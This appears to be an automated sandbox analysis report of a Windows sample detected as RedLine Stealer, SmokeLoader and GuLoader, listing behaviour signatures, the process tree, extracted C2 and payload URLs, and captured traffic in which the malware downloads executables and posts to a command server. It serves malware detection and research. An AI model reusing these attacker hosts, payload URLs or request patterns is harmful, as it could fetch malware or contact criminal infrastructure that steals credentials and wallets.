Loading ...

Play interactive tourEdit tour

Windows Analysis Report fw8ex1BNek.exe

Overview

General Information

Sample Name:fw8ex1BNek.exe
Analysis ID:542025
MD5:6a4b078a500c92ae7bbf3563a49fb100
SHA1:03005f11d47b9ef868df361c1603f33a9cee55fd
SHA256:a5acef0be0bd9993e756bb20a6b4e9fc2b1e819a02992255e4839d217ecf7258
Tags:exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

GuLoader RedLine SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Yara detected GuLoader
Found malware configuration
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Injects a PE file into a foreign processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
.NET source code references suspicious native API functions
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Internet Provider seen in connection with other malware
Yara detected Credential Stealer
Contains functionality to call native functions
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • fw8ex1BNek.exe (PID: 1624 cmdline: "C:\Users\user\Desktop\fw8ex1BNek.exe" MD5: 6A4B078A500C92AE7BBF3563A49FB100)
    • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • DB56.exe (PID: 3496 cmdline: C:\Users\user\AppData\Local\Temp\DB56.exe MD5: F2F8A2B12CB2E41FFBE135B6ED9B5B7C)
        • DB56.exe (PID: 4272 cmdline: C:\Users\user\AppData\Local\Temp\DB56.exe MD5: F2F8A2B12CB2E41FFBE135B6ED9B5B7C)
      • 4924.exe (PID: 6316 cmdline: C:\Users\user\AppData\Local\Temp\4924.exe MD5: 4C2D293F6A8F5AB1D869EFDFCD4AD41A)
      • 8CE5.exe (PID: 5548 cmdline: C:\Users\user\AppData\Local\Temp\8CE5.exe MD5: EC1105BE312FD184FFC9D7F272D64B87)
  • acgvitw (PID: 1752 cmdline: C:\Users\user\AppData\Roaming\acgvitw MD5: 6A4B078A500C92AE7BBF3563A49FB100)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": "45.9.20.240:46257"}

Threatname: GuLoader

{"Payload URL": "http://185.112.83.8/InjectHollowing.bin"}

Threatname: SmokeLoader

{"C2 list": ["http://rcacademy.at/upload/", "http://e-lanpengeonline.com/upload/", "http://vjcmvz.cn/upload/", "http://galala.ru/upload/", "http://witra.ru/upload/"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000017.00000002.622456667.00000000021A5000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    0000000B.00000002.481080184.0000000000661000.00000004.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000005.00000000.405588327.0000000002E51000.00000020.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        00000012.00000002.617991454.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000000.00000002.427646956.00000000007C1000.00000004.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            Click to see the 19 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.fw8ex1BNek.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              0.2.fw8ex1BNek.exe.630e50.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                23.2.4924.exe.21e6516.2.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  23.2.4924.exe.2610000.6.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    23.2.4924.exe.2440000.4.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      Click to see the 21 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: http://45.9.20.240:7769/Igno.exeAvira URL Cloud: Label: malware
                      Source: http://185.112.83.8/install3.exeAvira URL Cloud: Label: malware
                      Source: http://galala.ru/upload/Avira URL Cloud: Label: malware
                      Source: http://witra.ru/upload/Avira URL Cloud: Label: malware
                      Found malware configurationShow sources
                      Source: 00000017.00000002.622456667.00000000021A5000.00000004.00000001.sdmpMalware Configuration Extractor: RedLine {"C2 url": "45.9.20.240:46257"}
                      Source: 0000000B.00000002.481062049.0000000000640000.00000004.00000001.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://rcacademy.at/upload/", "http://e-lanpengeonline.com/upload/", "http://vjcmvz.cn/upload/", "http://galala.ru/upload/", "http://witra.ru/upload/"]}
                      Source: 00000018.00000002.621930773.0000000002860000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://185.112.83.8/InjectHollowing.bin"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: fw8ex1BNek.exeVirustotal: Detection: 39%Perma Link
                      Source: fw8ex1BNek.exeReversingLabs: Detection: 37%
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: rcacademy.atVirustotal: Detection: 11%Perma Link
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\8CE5.exeReversingLabs: Detection: 17%
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeReversingLabs: Detection: 60%
                      Source: C:\Users\user\AppData\Roaming\acgvitwReversingLabs: Detection: 37%
                      Machine Learning detection for sampleShow sources
                      Source: fw8ex1BNek.exeJoe Sandbox ML: detected
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Local\Temp\DB56.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\acgvitwJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeJoe Sandbox ML: detected

                      Compliance:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\4924.exeUnpacked PE file: 23.2.4924.exe.400000.0.unpack
                      Source: fw8ex1BNek.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\fw8ex1BNek.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.6:49796 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 50.62.140.96:443 -> 192.168.2.6:49830 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 50.62.140.96:443 -> 192.168.2.6:49831 version: TLS 1.2
                      Source: Binary string: =bC:\xacozon\wujonemapafer\wivasekazifiki\zefixib.pdb source: fw8ex1BNek.exe, acgvitw.5.dr
                      Source: Binary string: C:\xacozon\wujonemapafer\wivasekazifiki\zefixib.pdb source: fw8ex1BNek.exe, acgvitw.5.dr
                      Source: Binary string: _.pdb source: 4924.exe, 00000017.00000002.622456667.00000000021A5000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.624238934.0000000002440000.00000004.00020000.sdmp
                      Source: Binary string: 3C:\wiwumife\cogecaviladeho\zirup.pdb source: 4924.exe.5.dr
                      Source: Binary string: C:\wiwumife\cogecaviladeho\zirup.pdb source: 4924.exe.5.dr

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeDomain query: www.bastinscustomfab.com
                      Source: C:\Windows\explorer.exeDomain query: rcacademy.at
                      Source: C:\Windows\explorer.exeDomain query: bastinscustomfab.com
                      Uses known network protocols on non-standard portsShow sources
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 7769
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7769 -> 49850
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorURLs: http://185.112.83.8/InjectHollowing.bin
                      Source: Malware configuration extractorURLs: http://rcacademy.at/upload/
                      Source: Malware configuration extractorURLs: http://e-lanpengeonline.com/upload/
                      Source: Malware configuration extractorURLs: http://vjcmvz.cn/upload/
                      Source: Malware configuration extractorURLs: http://galala.ru/upload/
                      Source: Malware configuration extractorURLs: http://witra.ru/upload/
                      Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Fri, 17 Dec 2021 07:07:38 GMTAccept-Ranges: bytesETag: "8d927cc614f3d71:0"Server: Microsoft-IIS/10.0Date: Sat, 18 Dec 2021 14:32:43 GMTContent-Length: 94424Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 08 81 e9 50 66 d2 e9 50 66 d2 e9 50 66 d2 2a 5f 39 d2 eb 50 66 d2 e9 50 67 d2 4c 50 66 d2 2a 5f 3b d2 e6 50 66 d2 bd 73 56 d2 e3 50 66 d2 2e 56 60 d2 e8 50 66 d2 52 69 63 68 e9 50 66 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a 9b 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 6a 00 00 00 da 02 00 00 08 00 00 2d 35 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 04 00 00 04 00 00 a6 2f 02 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 86 00 00 a0 00 00 00 00 c0 04 00 48 0e 00 00 00 00 00 00 00 00 00 00 88 5c 01 00 50 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 97 68 00 00 00 10 00 00 00 6a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 14 00 00 00 80 00 00 00 16 00 00 00 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 b0 02 00 00 a0 00 00 00 06 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 60 01 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 48 0e 00 00 00 c0 04 00 00 10 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: GET /attachments/921473641538027521/921473810035793960/Vorticism.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
                      Source: global trafficHTTP traffic detected: GET /veldolore/scc.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bastinscustomfab.com
                      Source: global trafficHTTP traffic detected: GET /veldolore/scc.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.bastinscustomfab.comCookie: PHPSESSID=905f1348cca402f214daeb63de69114c
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sbhfij.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uexckctm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ydnswljr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vyedgkcsgg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rydxhqucb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uwbia.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lwahbovc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uvqqrvitjv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pawqkjnqlq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vbely.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 158Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wfquy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://svlbtjow.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nrenwf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 176Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kliyespolk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hjmjrvm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tvgdwnrq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bhqvtkcroe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wayrnqsako.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ayamwyb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gffroy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ysuckj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qmchuh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tnsiunfk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ydbdqcx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 300Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://myjlsdvf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jfeippj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dgwuv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lvxkwka.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: GET /Igno.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.9.20.240:7769
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lbswig.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rmxlxoqtyn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pwwgj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rwrqu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hetky.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wadndxm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://whrkpnnn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 232Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://udjjtqdogg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cyvwwwlnbx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uwrfdbfbaa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: GET /install3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.112.83.8
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bvyrwnlgbc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vbwucidikt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hwmsuk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qkybqrxqpe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uaqwoemuq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nyexyommxu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: rcacademy.at
                      Source: global trafficHTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jawmd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: rcacademy.at
